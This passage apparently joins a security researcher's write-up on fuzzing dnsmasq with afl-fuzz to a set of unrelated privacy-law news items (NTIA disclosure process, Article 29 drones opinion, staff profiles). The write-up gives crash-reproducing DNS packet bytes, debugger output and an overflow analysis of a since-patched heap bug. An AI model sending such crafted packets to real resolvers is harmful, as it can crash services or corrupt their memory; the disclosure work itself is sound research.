If you do the math, you'll see that "skullsecurity.org" takes up 18 bytes, and would be included in the response packet 12 times, counting the question, which means we're effectively wasting 18 * 11 or close to 200 bytes. In the old days, 200 bytes were a lot. Heck, in the new days, 200 bytes are still a lot when you're dealing with millions of requests.

Record pointers

Remember how I said that name fields starting with numbers above 63 - 0x3f - are special? Well, the one we're going to pay attention to is 0xc0.

0xc0 effectively means, "the next byte is a pointer, starting from the first byte of the packet, to where you can find the rest of the name".

So typically, you'll see:

  • 12-bytes header (trn_id + flags + counts)
  • question 1: ANY record for "skullsecurity.org"
  • answer 1: \xc0\x0c has a TXT record of "oh hai NSA"
  • answer 2: \xc0\x0c ...

"\xc0" indicates a pointer is coming, and "\x0c" says "look 0x0c (12) bytes from the start of the packet", which is immediately after the header. You can also use it as part of a domain name, so your answer could be "\x03www\xc0\x0c", which would become "www.skullsecurity.org" (assuming that string was 12 bytes from the start).

This is only mildly relevant, but a common problem that DNS parsers (both clients and servers) have to deal with is the infinite loop attack. Basically, the following packet structure:

  • 12-byte header
  • question 1: ANY record for "\xc0\x0c"

Because question 1 is self-referential, it reads itself over and over and the name never finishes parsing. dnsmasq solves this by limiting reference to 256 hops - that decision prevents a denial-of-service attack, but it's also what makes this vulnerability likely exploitable. :)

Setting up the fuzz

All right, by now we're DNS experts, right? Good, because we're going to be building a DNS packet by hand right away!

Before we get to the actual vulnerability, I want to talk about how I set up the fuzzing. Being a networked application, it makes sense to use a network fuzzer; however, I really wanted to try out afl-fuzz from lcamtuf, which is a file-format fuzzer.

afl-fuzz works as an intelligent file-format fuzzer that will instrument the executable (either by specially compiling it or using binary analysis) to determine whether or not it's hitting "new" code on each execution. It optimizes each cycle to take advantage of all the new code paths it's found. It's really quite cool!

Unfortunately, DNS doesn't use files, it uses packets. But because the client and server each process only one single packet at a time, I decided to modify dnsmasq to read a packet from a file, parse it (either as a request or a response), then exit. That made it possible to fuzz with afl-fuzz.

Unfortunately, that was actually pretty non-trivial. The parsing code and networking code were all mixed together. I ended up re-implementing "recv_msg()" and "recv_from()", among other things, and replacing their calls to those functions. That could also be done with a LD_PRELOAD hook, but because I had source that wasn't necessary. If you want to see the changes I made to make it possible to fuzz, you can search the codebase for "#ifdef FUZZ" - I made the fuzzing stuff entirely optional.

If you want to follow along, you should be able to reproduce the crash with the following commands (I'm on 64-bit Linux, but I don't see why it wouldn't work elsewhere):

$ git clone https://github.com/iagox86/dnsmasq-fuzzing
Cloning into 'dnsmasq-fuzzing'...
[...]
$ cd dnsmasq-fuzzing/
$ CFLAGS=-DFUZZ make -j10
[...]
$ ./src/dnsmasq -d --randomize-port --client-fuzz fuzzing/crashes/client-heap-overflow-1.bin
dnsmasq: started, version  cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP no-conntrack ipset auth DNSSEC loop-detect inotify
dnsmasq: reading /etc/resolv.conf
[...]
Segmentation fault

Warning: DNS is recursive, and in my fuzzing modifications I didn't disable the recursive requests. That means that dnsmasq will forward some of your traffic to upstream DNS servers, and that traffic could impact those severs (and I actually proved that, by accident; but we won't get into that :) ).

Doing the actual fuzzing

Once you've set up the program to be fuzzable, fuzzing it is actually really easy.

First, you need a DNS request and response - that way, we can fuzz both sides (though ultimately, we don't need to for this particular vulnerability, since both the request and response parse names).

If you've wasted your life like I have, you can just write the request by hand and send it to a server, then capture the response:

$ mkdir -p fuzzing/client/input/
$ mkdir -p fuzzing/client/output/
$ echo -ne "\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x06google\x03com\x00\x00\x01\x00\x01" > fuzzing/client/input/request.bin
$ mkdir -p fuzzing/server/input/
$ mkdir -p fuzzing/server/output/
$ cat request.bin | nc -vv -u 8.8.8.8 53 > fuzzing/server/input/response.bin

To break down the packet, in case you're curious

  • "\x12\x34" - trn_id - just a random number
  • "\x01\x00" - flags - I think that flag is RD - recursion desired
  • "\x00\x01" - qdcount = 1
  • "\x00\x00" - ancount = 0
  • "\x00\x00" - nscount = 0
  • "\x00\x00" - arcount = 0
  • "\x06google\x03com\x00" - name = "google.com"
  • "\x00\x01" - type = A record
  • "\x00\x01" - class = IN (Internet)

You can verify it's working by hexdump'ing the response:

$ hexdump -C response.bin
00000000  12 34 81 80 00 01 00 0b  00 00 00 00 06 67 6f 6f  |.4...........goo|
00000010  67 6c 65 03 63 6f 6d 00  00 01 00 01 c0 0c 00 01  |gle.com.........|
00000020  00 01 00 00 01 2b 00 04  ad c2 21 67 c0 0c 00 01  |.....+....!g....|
00000030  00 01 00 00 01 2b 00 04  ad c2 21 66 c0 0c 00 01  |.....+....!f....|
00000040  00 01 00 00 01 2b 00 04  ad c2 21 69 c0 0c 00 01  |.....+....!i....|
00000050  00 01 00 00 01 2b 00 04  ad c2 21 68 c0 0c 00 01  |.....+....!h....|
00000060  00 01 00 00 01 2b 00 04  ad c2 21 63 c0 0c 00 01  |.....+....!c....|
00000070  00 01 00 00 01 2b 00 04  ad c2 21 61 c0 0c 00 01  |.....+....!a....|
00000080  00 01 00 00 01 2b 00 04  ad c2 21 6e c0 0c 00 01  |.....+....!n....|
00000090  00 01 00 00 01 2b 00 04  ad c2 21 64 c0 0c 00 01  |.....+....!d....|
000000a0  00 01 00 00 01 2b 00 04  ad c2 21 60 c0 0c 00 01  |.....+....!`....|
000000b0  00 01 00 00 01 2b 00 04  ad c2 21 65 c0 0c 00 01  |.....+....!e....|
000000c0  00 01 00 00 01 2b 00 04  ad c2 21 62              |.....+....!b|

Notice how it starts with "\x12\x34" (the same transaction id I sent), has a question count of 1, has an answer count of 0x0b (11), and contains "\x06google\x03com\x00" 12 bytes in (that's the question). That's basically what we discussed earlier. But the important part is, it has "\xc0\x0c" throughout. In fact, every answer starts with "\xc0\x0c", because every answer is to the first and only question.

That's exactly what I was talking about earlier - each of those 11 instances of "\xc0\x0c" saved about 10 bytes, so the packet is 110 bytes shorter than it would otherwise have been.

Now that we have a base case for both the client and the server, we can compile the binary with afl-fuzz's instrumentation. Obviously, this command assumes that afl-fuzz is stored in "~/tools/afl-1.77b" - change as necessary. If you're trying to compile the original code, it doesn't accept CC= or CFLAGS= on the commandline unless you apply this patch first.

Here's the compile command:

$ CC=~/tools/afl-1.77b/afl-gcc CFLAGS=-DFUZZ make -j20

and run the fuzzer:

$ ~/tools/afl-1.77b/afl-fuzz -i fuzzing/client/input/ -o fuzzing/client/output/ ./dnsmasq --client-fuzz=@@

you can simultaneously fuzz the server, too, in a different window:

$ ~/tools/afl-1.77b/afl-fuzz -i fuzzing/server/input/ -o fuzzing/server/output/ ./dnsmasq --server-fuzz=@@

then let them run a few hours, or possibly overnight.

For fun, I ran a third instance:

$ mkdir -p fuzzing/hello/input
$ echo "hello" > fuzzing/hello/input/hello.bin
$ mkdir -p fuzzing/hello/output
$ ~/tools/afl-1.77b/afl-fuzz -i fuzzing/fun/input/ -o fuzzing/fun/output/ ./dnsmasq --server-fuzz=@@

...which, in spite of being seeded with "hello" instead of an actual DNS packet, actually found an order of magnitude more crashes than the proper packets, except with much, much uglier proofs of concept.. :)

Fuzz results

I let this run overnight, specifically to re-create the crashes for this blog. In the morning (after roughly 20 hours of fuzzing), the results were:

  • 7 crashes starting with a well formed request
  • 10 crashes starting from a well formed response
  • 93 crashes starting from "hello"

You can download the base cases and results here, if you want.

Triage

Although we have over a hundred crashes, I know from experience that they're all caused by the same core problem. But not knowing that, I need to pick something to triage! The difference between starting from a well formed request and starting from a "hello" string is noticeable... to take the smallest PoC from "hello", we have:

crashes $ hexdump -C id\:000024\,sig\:11\,src\:000234+000399\,op\:splice\,rep\:16
00000000  68 00 00 00 00 01 00 02  e8 1f ec 13 07 06 e9 01  |h...............|
00000010  67 02 e8 1f c0 c0 c0 c0  c0 c0 c0 c0 c0 c0 c0 c0  |g...............|
00000020  c0 c0 c0 c0 c0 c0 c0 c0  c0 c0 c0 c0 c0 c0 c0 c0  |................|
00000030  c0 c0 c0 c0 c0 c0 c0 c0  c0 c0 b8 c0 c0 c0 c0 c0  |................|
00000040  c0 c0 c0 c0 c0 c0 c0 c0  c0 c0 c0 c0 c0 c0 c0 c0  |................|
00000050  c0 c0 c0 c0 c0 c0 c0 c0  c0 af c0 c0 c0 c0 c0 c0  |................|
00000060  c0 c0 c0 c0 cc 1c 03 10  c0 01 00 00 02 67 02 e8  |.............g..|
00000070  1f eb ed 07 06 e9 01 67  02 e8 1f 2e 2e 10 2e 2e  |.......g........|
00000080  00 07 2e 2e 2e 2e 00 07  01 02 07 02 02 02 07 06  |................|
00000090  00 00 00 00 7e bd 02 e8  1f ec 07 07 01 02 07 02  |....~...........|
000000a0  02 02 07 06 00 00 00 00  02 64 02 e8 1f ec 07 07  |.........d......|
000000b0  06 ff 07 9c 06 49 2e 2e  2e 2e 00 07 01 02 07 02  |.....I..........|
000000c0  02 02 05 05 e7 02 02 02  e8 03 02 02 02 02 80 c0  |................|
000000d0  c0 c0 c0 c0 c0 c0 c0 c0  c0 80 1c 03 10 80 e6 c0  |................|
000000e0  c0 c0 c0 c0 c0 c0 c0 c0  c0 c0 c0 c0 c0 c0 c0 c0  |................|
000000f0  c0 c0 c0 c0 c0 c0 b8 c0  c0 c0 c0 c0 c0 c0 c0 c0  |................|
00000100  c0 c0 c0 c0 c0 c0 c0 c0  c0 c0 c0 c0 c0 c0 c0 c0  |................|
00000110  c0 c0 c0 c0 c0 af c0 c0  c0 c0 c0 c0 c0 c0 c0 c0  |................|
00000120  cc 1c 03 10 c0 01 00 00  02 67 02 e8 1f eb ed 07  |.........g......|
00000130  00 95 02 02 02 05 e7 02  02 10 02 02 02 02 02 00  |................|
00000140  00 80 03 02 02 02 f0 7f  c7 00 80 1c 03 10 80 e6  |................|
00000150  00 95 02 02 02 05 e7 67  02 02 02 02 02 02 02 00  |.......g........|
00000160  00 80                                             |..|

Or, if we run afl-tmin on it to minimize:

00000000  30 30 00 30 00 01 30 30  30 30 30 30 30 30 30 30  |00.0..0000000000|
00000010  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000020  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000030  30 30 30 30 30 30 30 30  30 30 30 30 30 c0 c0 30  |0000000000000..0|
00000040  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000050  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000060  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000070  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000080  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
00000090  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
000000a0  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
000000b0  30 30 30 30 30 30 30 30  30 30 30 30 30 30 30 30  |0000000000000000|
000000c0  05 30 30 30 30 30 c0 c0

(note the 0xc0 at the end - our old friend - but instead of figuring out "\xc0\x0c", the simplest case, it found a much more complex case)

Whereas here are all four crashing messages from the valid request starting point:

crashes $ hexdump -C id\:000000\,sig\:11\,src\:000034\,op\:flip2\,pos\:24
00000000  12 34 01 00 00 01 00 00  00 00 00 00 06 67 6f 6f  |.4...........goo|
00000010  67 6c 65 03 63 6f 6d c0  0c 01 00 01              |gle.com.....|
0000001c
crashes $ hexdump -C id\:000001\,sig\:11\,src\:000034\,op\:havoc\,rep\:4
00000000  12 34 08 00 00 01 00 00  e1 00 00 00 06 67 6f 6f  |.4...........goo|
00000010  67 6c 65 03 63 6f 6d c0  0c 01 00 01              |gle.com.....|
0000001c
crashes $ hexdump -C id\:000002\,sig\:11\,src\:000034\,op\:havoc\,rep\:2
00000000  12 34 01 00 eb 00 00 00  00 00 00 00 06 67 6f 6f  |.4...........goo|
00000010  67 6c 65 03 63 6f 6d c0  0c 01 00 01              |gle.com.....|
crashes $ hexdump -C id\:000003\,sig\:11\,src\:000034\,op\:havoc\,rep\:4
00000000  12 34 01 00 00 01 01 00  00 00 10 00 06 67 6f 6f  |.4...........goo|
00000010  67 6c 65 03 63 6f 6d c0  0c 00 00 00 00 00 06 67  |gle.com........g|
00000020  6f 6f 67 6c 65 03 63 6f  6d c0 00 01 00 01        |oogle.com.....|
0000002e

The first three crashes are interesting, because they're very similar. The only differences are the flags field (0x0100 or 0x0800) and the count fields (the first is unmodified, the second has 0xe100 "authority" records listed, and the third has 0xeb00 "question" records). Presumably, that stuff doesn't matter, since random-looking values work.

Also note that near the end of every message, we see our old friend again: "\xc0\x0c".

We can run afl-tmin on the first one to get the tightest message we can:

00000000  30 30 30 30 30 30 30 30  30 30 30 30 06 30 6f 30  |000000000000.0o0|
00000010  30 30 30 03 30 30 30 c0  0c                       |000.000..|

As predicted, the question and answer counts don't matter. All that matters is the name's length fields and the "\xc0\x0c". Oddly it included the "o" from google.com, which is probably a bug (my fuzzing instrumentation isn't perfect because due to requests going to the Internet, the result isn't always deterministic).

The vulnerability

Now that we have a decent PoC, let's check it out in a debugger:

$ gdb -q --args ./dnsmasq -d --randomize-port --client-fuzz=./min.bin
Reading symbols from ./dnsmasq...done.
Unable to determine compiler version.
Skipping loading of libstdc++ pretty-printers for now.
(gdb) run
[...]
Program received signal SIGSEGV, Segmentation fault.
__strcpy_sse2 () at ../sysdeps/x86_64/multiarch/../strcpy.S:135
135     ../sysdeps/x86_64/multiarch/../strcpy.S: No such file or directory.

It crashed in strcpy. Fun! Let's see the line it crashed on:

(gdb) x/i $rip
=> 0x7ffff73cc600 <__strcpy_sse2+192>:  mov    BYTE PTR [rdx],al
(gdb) print/x $rdx
$1 = 0x0

Oh, a null-pointer write. Seems pretty lame.

Honestly, when I got here, I lost steam. Null-pointer dereferences need to be fixed, especially because they can hide other bugs, but they aren't going to earn me l33t status. So I would have to fix it or deal with hundreds of crappy results.

If we look at the packet in more detail, the name it's parsing is essentially: "\x06AAAAAA\x03AAA\xc0\x0c" (changed '0' to 'A' to make it easier on the eyes). The "\xc0\x0c" construct reference 12 bytes into the message, which is the start of the name. When it's parsed, after one round, it'll be "\x06AAAAAA\x03AAA\x06AAAAAA\x03AAA\xc0\x0c". But then it reaches the "\xc0\x0c" again, and goes back to the beginning. Basically, it infinite loops in the name parser.

So, it's obvious that a self-referential name causes the problem. But why?

I tracked down the code that handles 0xc0. It's in rfc1035.c, and looks like:

     if (label_type == 0xc0) /* pointer */
        {
          if (!CHECK_LEN(header, p, plen, 1))
            return 0;

          /* get offset */
          l = (l&0x3f) << 8;
          l |= *p++;

          if (!p1) /* first jump, save location to go back to */
            p1 = p;

          hops++; /* break malicious infinite loops */
          if (hops > 255)
          {
            printf("Too many hops!\n");
            printf("Returning: [%d] %s\n", ((uint64_t)cp) - ((uint64_t)name), name);
            return 0;
          }

          p = l + (unsigned char *)header;
        }

If look at that code, everything looks pretty okay (and for what it's worth, the printf()s are my instrumentation and aren't in the original). If that's not the problem, the only other field type being parsed is the name part (ie, the part without 0x40/0xc0/etc. in front). Here's the code (with a bunch of stuff removed and the indents re-flowed):

  namelen += l;
  if (namelen+1 >= MAXDNAME)
  {
    printf("namelen is too long!\n"); /* <-- This is what triggers. */
    printf("Returning: [%d] %s\n", ((uint64_t)cp) - ((uint64_t)name), name);
    return 0;
  }
  if (!CHECK_LEN(header, p, plen, l))
  {
    printf("CHECK_LEN failed!\n");
    return 0;
  }
  for(j=0; j<l; j++, p++)
  {
    unsigned char c = *p;
    if (c != 0 && c != '.')
      *cp++ = c;
    else
      return 0;
  }
  *cp++ = '.';

This code runs for each segment that starts with a value less than 64 ("google" and "com", for example).

At the start, l is the length of the segment (so 6 in the case of "google"). It adds that to the current TOTAL length - namelen - then checks if it's too long - this is the check that prevents a buffer overflow.

Then it reads in l bytes, one at a time, and copies them into a buffer - cp - which happens to be on the heap. the namelen check prevents that from overflowing.

Then it copies a period into the buffer and doesn't increment namelen.

Do you see the problem there? It adds l to the total length of the buffer, then it reads in l + 1 bytes, counting the period. Oops?

It turns out, you can mess around with the length and size of substrings quite a bit to get a lot of control over what's written where, but exploiting it is as simple as doing a lookup for "\x08AAAAAAAA\xc0\x0c":

$ echo -ne '\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x08AAAAAAAA\xc0\x0c\x00\x00\x01\x00\x01' > crash.bin
$ ./dnsmasq -d --randomize-port --client-fuzz=./crash.bin
[...]
Segmentation fault

However, there are two termination conditions: it'll only loop a grand total of 255 times, and it stops after namelen reaches 1024 (non-period) bytes. So coming up with the best possible balance to overwrite what you want is actually pretty tricky - possibly even requires a bit of calculus (or, if you're an engineer, a program that can optimize it for you :) ).

I should also mention: the reason the "\xc0\x0c" is needed in the first place is that it's impossible to have a name string in that's 1024 bytes - somewhere along the line, it runs afoul of a length check. The "\xc0\x0c" method lets us repeat stuff over and over, sort of like decompressing a small string into memory, overflowing the buffer.

Exploitability

I mentioned earlier that it's a null-pointer deref:

(gdb) x/i $rip
=> 0x7ffff73cc600 <__strcpy_sse2+192>:  mov    BYTE PTR [rdx],al
(gdb) print/x $rdx
$1 = 0x0

Let's try again with the crash.bin file we just created, using "\x08AAAAAAAA\xc0\x0c" as the payload:

$ echo -ne '\x12\x34\x01\x00\x00\x01\x00\x00\x00\x00\x00\x00\x08AAAAAAAA\xc0\x0c\x00\x00\x01\x00\x01' > crash.bin
$ gdb -q --args ./dnsmasq -d --randomize-port --client-fuzz=./crash.bin
[...]
(gdb) run
[...]
(gdb) x/i $rip
=> 0x449998 <answer_request+1064>:      mov    DWORD PTR [rdx+0x20],0x0
(gdb) print/x $rdx
$1 = 0x4141412e41414141

Woah.. that's not a null-pointer dereference! That's a write-NUL-byte-to-arbitrary-memory! Those might be exploitable!

As I mentioned earlier, this is actually a heap overflow. The interesting part is, the heap memory is allocated once - immediately after the program starts - and right after, a heap for the global settings object (daemon) is allocated. That means that we have effectively full control of this object, at least the first couple hundred bytes:

extern struct daemon {
  /* datastuctures representing the command-line and.
     config file arguments. All set (including defaults)
     in option.c */

  unsigned int options, options2;
  struct resolvc default_resolv, *resolv_files;
  time_t last_resolv;
  char *servers_file;
  struct mx_srv_record *mxnames;
  struct naptr *naptr;
  struct txt_record *txt, *rr;
  struct ptr_record *ptr;
  struct host_record *host_records, *host_records_tail;
  struct cname *cnames;
  struct auth_zone *auth_zones;
  struct interface_name *int_names;
  char *mxtarget;
  int addr4_netmask;
  int addr6_netmask;
  char *lease_file;.
  char *username, *groupname, *scriptuser;
  char *luascript;
  char *authserver, *hostmaster;
  struct iname *authinterface;
  struct name_list *secondary_forward_server;
  int group_set, osport;
  char *domain_suffix;
  struct cond_domain *cond_domain, *synth_domains;
  char *runfile;.
  char *lease_change_command;
  struct iname *if_names, *if_addrs, *if_except, *dhcp_except, *auth_peers, *tftp_interfaces;
  struct bogus_addr *bogus_addr, *ignore_addr;
  struct server *servers;
  struct ipsets *ipsets;
  int log_fac; /* log facility */
  char *log_file; /* optional log file */                                                                                                              int max_logs;  /* queue limit */
  int cachesize, ftabsize;
  int port, query_port, min_port;
  unsigned long local_ttl, neg_ttl, max_ttl, min_cache_ttl, max_cache_ttl, auth_ttl;
  struct hostsfile *addn_hosts;
  struct dhcp_context *dhcp, *dhcp6;
  struct ra_interface *ra_interfaces;
  struct dhcp_config *dhcp_conf;
  struct dhcp_opt *dhcp_opts, *dhcp_match, *dhcp_opts6, *dhcp_match6;
  struct dhcp_vendor *dhcp_vendors;
  struct dhcp_mac *dhcp_macs;
  struct dhcp_boot *boot_config;
  struct pxe_service *pxe_services;
  struct tag_if *tag_if;.
  struct addr_list *override_relays;
  struct dhcp_relay *relay4, *relay6;
  int override;
  int enable_pxe;
  int doing_ra, doing_dhcp6;
  struct dhcp_netid_list *dhcp_ignore, *dhcp_ignore_names, *dhcp_gen_names;.
  struct dhcp_netid_list *force_broadcast, *bootp_dynamic;
  struct hostsfile *dhcp_hosts_file, *dhcp_opts_file, *dynamic_dirs;
  int dhcp_max, tftp_max;
  int dhcp_server_port, dhcp_client_port;
  int start_tftp_port, end_tftp_port;.
  unsigned int min_leasetime;
  struct doctor *doctors;
  unsigned short edns_pktsz;
  char *tftp_prefix;.
  struct tftp_prefix *if_prefix; /* per-interface TFTP prefixes */
  unsigned int duid_enterprise, duid_config_len;
  unsigned char *duid_config;
  char *dbus_name;
  unsigned long soa_sn, soa_refresh, soa_retry, soa_expiry;
#ifdef OPTION6_PREFIX_CLASS.
  struct prefix_class *prefix_classes;
#endif
#ifdef HAVE_DNSSEC
  struct ds_config *ds;
  char *timestamp_file;
#endif

  /* globally used stuff for DNS */
  char *packet; /* packet buffer */
  int packet_buff_sz; /* size of above */
  char *namebuff; /* MAXDNAME size buffer */
#ifdef HAVE_DNSSEC
  char *keyname; /* MAXDNAME size buffer */
  char *workspacename; /* ditto */
#endif
  unsigned int local_answer, queries_forwarded, auth_answer;
  struct frec *frec_list;
  struct serverfd *sfds;
  struct irec *interfaces;
  struct listener *listeners;
  struct server *last_server;
  time_t forwardtime;
  int forwardcount;
  struct server *srv_save; /* Used for resend on DoD */
  size_t packet_len;       /*      "        "        */
  struct randfd *rfd_save; /*      "        "        */
  pid_t tcp_pids[MAX_PROCS];
  struct randfd randomsocks[RANDOM_SOCKS];
  int v6pktinfo;.
  struct addrlist *interface_addrs; /* list of all addresses/prefix lengths associated with all local interfaces */
  int log_id, log_display_id; /* ids of transactions for logging */
  union mysockaddr *log_source_addr;

  /* DHCP state */
  int dhcpfd, helperfd, pxefd;.
#ifdef HAVE_INOTIFY
  int inotifyfd;
#endif
#if defined(HAVE_LINUX_NETWORK)
  int netlinkfd;
#elif defined(HAVE_BSD_NETWORK)
  int dhcp_raw_fd, dhcp_icmp_fd, routefd;
#endif
  struct iovec dhcp_packet;
  char *dhcp_buff, *dhcp_buff2, *dhcp_buff3;
  struct ping_result *ping_results;
  FILE *lease_stream;
  struct dhcp_bridge *bridges;
#ifdef HAVE_DHCP6
  int duid_len;
  unsigned char *duid;
  struct iovec outpacket;
  int dhcp6fd, icmp6fd;
#endif
  /* DBus stuff */
  /* void * here to avoid depending on dbus headers outside dbus.c */
  void *dbus;
#ifdef HAVE_DBUS
  struct watch *watches;
#endif

  /* TFTP stuff */
  struct tftp_transfer *tftp_trans, *tftp_done_trans;

  /* utility string buffer, hold max sized IP address as string */
  char *addrbuff;
  char *addrbuff2; /* only allocated when OPT_EXTRALOG */
} *daemon;

I haven't measured how far into that structure you can write, but the total number of bytes we can write into the 1024-byte buffer is 1368 bytes, so somewhere in the realm of the first 300 bytes are at risk.

The reason we saw a "null pointer dereference" and also a "write NUL byte to arbitrary memory" are both because we overwrote variables from that structure that are used later.

Patch

The patch is pretty straight forward: add 1 to namelen for the periods. There was a second version of the same vulnerability (forgotten period) in the 0x40 handler as well.

But..... I'm concerned about the whole idea of building a string and tracking the length next to it. That's a dangerous design pattern, and the chances of regressing when modifying any of the name parsing is high.

Exploit so-far

I started writing an exploit for it. Before I stopped, I basically found a way to brute-force build a string that would overwrite an arbitrary number of bytes by adding the right amount of padding and the right number of periods. That turned out to be a fairly difficult job, because there are various things you have to juggle (the padding at the front of the string and the size of the repeated field). It turns out, the maximum length you can get is 1368 bytes put into a 1024-byte buffer.

You can download it here.

...why it never got famous

I held this back throughout the blog because it's the sad part. :)

It turns out, since I was working from the git HEAD version, it was brand new code. After bissecting versions to figure out where the vulnerable code came from, I determined that it was present only in 2.73rc5 - 2.73rc7. After I reported it, the author rolled out 2.73rc8 with the fix.

It was disappointing, to say the least, but on the plus side the process was interesting enough to write about! :)

Conclusion

So to summarize everything...

  • I modified dnsmasq to read packets from a file instead of the network, then used afl-fuzz to fuzz and crash it.
  • I found a vulnerability that was recently introduced, when parsing "\xc0\x0c" names + using periods.
  • I triaged the vulnerability, and started writing an exploit.
  • Determined that the vulnerability was in brand new code, so I gave up on the exploit and decided to write a blog instead.

And who knows, maybe somebody will develop one for fun? If anybody does, I'll give them a month of Reddit Gold!!!! :)

(I'm kidding about using that as a motivator, but I'll really do it if anybody bothers :P)

NTIA Announces Cybersecurity Stakeholder Meeting

On July 9, 2015, the National Telecommunications and Information Administration (“NTIA”) announced the launch of its first cybersecurity multistakeholder process, in which representatives from across the security and technology industries will meet in September to discuss vulnerability research disclosure.

This process is the first effort of the multistakeholder initiative, which was announced by the Department of Commerce in March. The initiative aims to address the major cybersecurity threats and issues facing the digital ecosystem as a whole, shoring up such threats with an eye toward fostering a healthy economy in the digital space.

The NTIA will act as a neutral facilitator for discussions among security researchers, software vendors, and “those interested in a more secure digital ecosystem,” as those parties work toward developing best practices and common principles for operating safely in the digital arena. Although there is no set agenda or proposed result, the NTIA suggested in a fact sheet released by the White House that “potential outcomes could include a set of high level principles that could guide future private sector policies, or a more focused and applied set of best practices for a particular set of circumstances.”

The topic of vulnerability disclosure was selected after a comment period, which drew responses from the American Civil Liberties Union and Microsoft, as well as a number of cybersecurity organizations and other industry groups. Many of these groups expressed concern about the current climate of vulnerability disclosure, in which large corporations have frequently threatened legal action against “security researchers” who discover weaknesses in their systems and propose to announce such weaknesses publicly. Among the solutions presented by the comments are “bug bounty” programs, which actually incentivize such detection, as well as industry-wide agreements not to sue or report to law enforcement individuals who detect vulnerabilities.

The meeting has not been given an exact date or location, but is expected to be held in the San Francisco Bay-area, and will be simultaneously webcast.

Article 29 Working Party Issues Opinion on Drones

On June 16, 2015, the Article 29 Working Party (the “Working Party”) adopted an Opinion on Privacy and Data Protection Issues relating to the Utilization of Drones (“Opinion”). In the Opinion, the Working Party provides guidance on the application of data protection rules in the context of Remotely Piloted Aircraft Systems, commonly known as “drones.”

The Working Party deemed it necessary to issue specific guidance on this topic as the large-scale deployment of drones and sensor technology on board drones presents several risks with respect to privacy and data protection. These risks result, in particular, from the lack of transparency with regard to the personal data (such as images, sounds and geolocation data) processed by drones and the ability to use multiple drones to collect a wide variety of information for extended periods of time across large areas.

After identifying the privacy and data protection risks related to the use of drones and examining the applicability of EU Data Protection Directive 95/46/EC to drones, the Working Party provided recommendations for European and national legislators, manufacturers of drones and related equipment, and drone operators. The Working Party also provided specific guidelines for the use of drones by the police and other law enforcement authorities.

According to the Working Party’s recommendations, drone users should:

  • Verify the need to obtain prior authorization from the UK Civil Aviation Authorities.
  • Identify the most suitable legal ground for the processing of personal data while using drones.
  • Comply with the purpose limitation, data minimization and proportionality principles (e.g., by taking measures to avoid the collection of unnecessary personal data).
  • Ensure that individuals are properly informed about the processing of their personal data (e.g., by distributing leaflets to the public if drones are used during a public event) before operating a drone.
  • Implement measures to ensure that the personal data collected by drones is adequately protected and deleted or anonymized after it is no longer necessary.

In addition, drone manufacturers and operators should (1) take into account the privacy by design and privacy by default principles and (2) perform data protection impact assessments to evaluate the impact of drone applications on individuals’ right to privacy and data protection. In this respect, the Working Party requested the competent policymakers to facilitate these data protection impact assessments by developing and introducing a set of criteria for impact assessments that can easily be used by industry and drone operators.

The Working Party also (1) advised national and European regulators to introduce specific rules for the responsible use of drones and (2) suggested that manufacturers marketing small drones should be required to include sufficient information in the drone packaging about the “potential intrusiveness” of drones and the “need to respect European and national legislation and regulations protecting privacy, personal data and other fundamental rights.”

With respect to the use of drones for law enforcement purposes, the Working Party generally believes that (1) the use of drones for such purposes should be subject to judicial review and (2) law enforcement should not use drones to constantly track individuals.

Read full text of the Opinion.

Lisa Sotto Profiled in Crain’s New York Business on Breaches and Cyber Attacks

On June 29, 2015, Lisa J. Sotto, partner and head of the Global Privacy and Cybersecurity practice at Hunton & Williams LLP, was profiled in a Crain’s New York Business article entitled Lawyer Goes Into the Breach. The feature highlights the Hunton & Williams privacy team and the tireless work they do for their clients. Here is an excerpt from the article:

“Ms. Sotto came to her corner of the financial world a decade ago, after years working as an environmental lawyer. Spearheading Superfund cases was rewarding, but she was intrigued by the then-nascent field of mopping up messes for companies whose computer networks have been compromised. She has assembled a team of 25 lawyers specializing in finding experts to conduct forensic investigations into when and where breaches took place and what was stolen. With cyberattacks making the news practically every week, Ms. Sotto has gotten busier. Though computers have clearly made life better in lots of ways, more people than ever can crack into these electronic vaults and uncover personal data.”

Scottish Honor for Peter Hustinx

Richard Thomas, former UK Information Commissioner and Global Strategy Advisor to the Centre for Information Policy Leadership, was invited to a unique event in Scotland last week.

Peter Hustinx, who retired as the European Data Protection Supervisor at the end of 2014, was awarded the Honorary Degree of Doctor of Science in Social Science by the University of Edinburgh.

This rare distinction, recognizing Peter’s “achievements and leadership in the field of information privacy and data protection” was conferred during an elaborate graduation ceremony which took place in the famous Usher Hall in the center of Edinburgh on July 1. Peter was cheered on by all his immediate family and several of his British friends.

The other Honorary Doctorate was awarded to Prof. Fabiola Gianotti, the prospective Director-General of the European Organization for Nuclear Research, known as CERN, whose research with the Large Hadron Collider confirmed the existence of the Higgs boson. Her award was witnessed by Prof. Peter Higgs who received the Nobel Prize for his work establishing the theoretical possibility of this particle which bears his name.

Peter Hustinx stood tall alongside two giants of science whose work may yet reveal the origins of the universe. But, in the meantime, most people will probably treat the safeguarding of their privacy as a more immediate practical concern.

CIPL Urges Expansion of Privacy Toolkit Beyond Consent

